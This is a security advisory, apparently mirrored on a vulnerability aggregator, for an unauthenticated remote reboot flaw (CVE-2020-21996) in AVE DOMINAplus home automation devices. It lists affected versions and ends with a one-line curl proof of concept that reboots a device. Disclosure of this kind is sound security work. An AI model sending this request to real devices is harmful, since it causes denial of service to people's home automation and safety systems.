AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot

🗓️ 27 Dec 2019 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 65 Views

AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot. Vulnerability allows unauthenticated attackers to cause denial of service.

Reporter	Title	Published	Views	Family All 8
CNNVD	AVE DOMINAplus 访问控制错误漏洞	28 Apr 202100:00	–	cnnvd
CVE	CVE-2020-21996	28 Apr 202114:54	–	cve
Cvelist	CVE-2020-21996	28 Apr 202114:54	–	cvelist
EUVD	EUVD-2020-14762	7 Oct 202500:30	–	euvd
NVD	CVE-2020-21996	28 Apr 202115:15	–	nvd
Prion	Command injection	28 Apr 202115:15	–	prion
Positive Technologies	PT-2021-10711 · Unknown · Ave Dominaplus	28 Apr 202100:00	–	ptsecurity
RedhatCVE	CVE-2020-21996	22 May 202517:51	–	redhatcve

<html><body><p>AVE DOMINAplus &lt;=1.10.x Unauthenticated Remote Reboot


Vendor: AVE S.p.A.
Product web page: https://www.ave.it | https://www.domoticaplus.it
Affected version: Web Server Code 53AB-WBS - 1.10.62
                  Touch Screen Code TS01 - 1.0.65
                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
                  Touch Screen Code TS05 - 1.10.36
                  Models: 53AB-WBS
                          TS01
                          TS03V
                          TS04X-V
                          TS05N-V
                  App version: 1.10.77
                  App version: 1.10.65
                  App version: 1.10.64
                  App version: 1.10.62
                  App version: 1.10.60
                  App version: 1.10.52
                  App version: 1.10.52A
                  App version: 1.10.49
                  App version: 1.10.46
                  App version: 1.10.45
                  App version: 1.10.44
                  App version: 1.10.35
                  App version: 1.10.25
                  App version: 1.10.22
                  App version: 1.10.11
                  App version: 1.8.4
                  App version: TS1-1.0.65
                  App version: TS1-1.0.62
                  App version: TS1-1.0.44
                  App version: TS1-1.0.10
                  App version: TS1-1.0.9

Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
automation proposal that makes houses safer, more welcoming and optimized. In
fact, our home automation system introduces cutting-edge technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
and security and offers advanced supervision tools in order to learn how to
evaluate and reduce consumption through various solutions dedicated to energy
saving.

Desc: The application suffers from an unauthenticated reboot command execution.
Attackers can exploit this issue to cause a denial of service scenario.

Tested on: GNU/Linux 4.1.19-armv7-x7
           GNU/Linux 3.8.13-bone50/bone71.1/bone86
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Debian)
           PHP/5.5.9-1ubuntu4.23
           PHP/5.4.41-0+deb7u1
           PHP/5.4.36-0+deb7u3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5548
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php


06.10.2019

--

curl -sk https://192.168.1.10/restart.php &gt;/dev/null
</p></body></html>

27 Dec 2019 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 25

CVSS 3.17.5

EPSS0.05907